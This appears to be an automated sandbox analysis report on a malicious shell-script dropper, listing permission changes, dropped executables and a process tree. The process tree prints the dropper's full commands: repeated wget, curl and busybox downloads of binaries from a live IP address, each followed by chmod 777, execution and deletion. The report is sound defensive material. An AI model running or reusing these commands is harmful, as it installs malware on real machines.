Analysis Overview
SHA256
562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f
Threat Level: Shows suspicious behavior
The file 562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 02:21
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-29 02:21
Reported
2024-10-29 02:23
Platform
debian9-mipsel-20240226-en
Max time kernel
131s
Max time network
136s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | N/A |
| N/A | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | N/A |
| N/A | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | N/A |
| N/A | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | N/A |
| N/A | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | N/A |
| N/A | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | N/A |
| N/A | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | N/A |
| N/A | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | N/A |
| N/A | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | N/A |
| N/A | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | N/A |
| N/A | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | N/A |
| N/A | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | N/A |
| N/A | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | N/A |
| N/A | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | N/A |
| N/A | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | N/A |
| N/A | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | N/A |
| N/A | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | N/A |
| N/A | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | N/A |
| N/A | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | N/A |
| N/A | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | N/A |
| N/A | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | N/A |
| N/A | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | N/A |
| N/A | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | N/A |
| N/A | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | N/A |
| N/A | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | N/A |
| N/A | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | N/A |
| N/A | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | N/A |
| N/A | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb | /usr/bin/curl | N/A |
Processes
/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh
[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/chmod
[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem
[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/bin/rm
[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]
/usr/bin/wget
[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/chmod
[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj
[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/bin/rm
[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]
/usr/bin/wget
[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/chmod
[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i
[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/rm
[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/wget
[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/chmod
[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F
[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/rm
[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/wget
[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/chmod
[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E
[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/rm
[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/wget
[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/chmod
[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV
[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/rm
[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/wget
[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/chmod
[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby
[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/rm
[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/wget
[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/chmod
[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA
[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/rm
[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/wget
[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/chmod
[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D
[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/rm
[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/wget
[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/chmod
[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif
[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/rm
[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/wget
[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/chmod
[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb
[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/rm
[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/wget
[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/chmod
[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe
[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/rm
[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/wget
[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/chmod
[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK
[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/rm
[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/wget
[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/chmod
[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68
[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/bin/rm
[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]
/usr/bin/wget
[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/chmod
[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i
[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/bin/rm
[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]
/usr/bin/wget
[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/chmod
[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F
[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/bin/rm
[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]
/usr/bin/wget
[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/chmod
[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E
[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/bin/rm
[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]
/usr/bin/wget
[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/chmod
[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV
[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/bin/rm
[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]
/usr/bin/wget
[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/chmod
[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby
[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/bin/rm
[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]
/usr/bin/wget
[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/chmod
[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA
[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/bin/rm
[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]
/usr/bin/wget
[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/chmod
[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D
[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/bin/rm
[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]
/usr/bin/wget
[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/chmod
[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif
[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/bin/rm
[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]
/usr/bin/wget
[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/chmod
[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb
[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/bin/rm
[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]
/usr/bin/wget
[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/chmod
[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe
[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/bin/rm
[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]
/usr/bin/wget
[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]
/bin/busybox
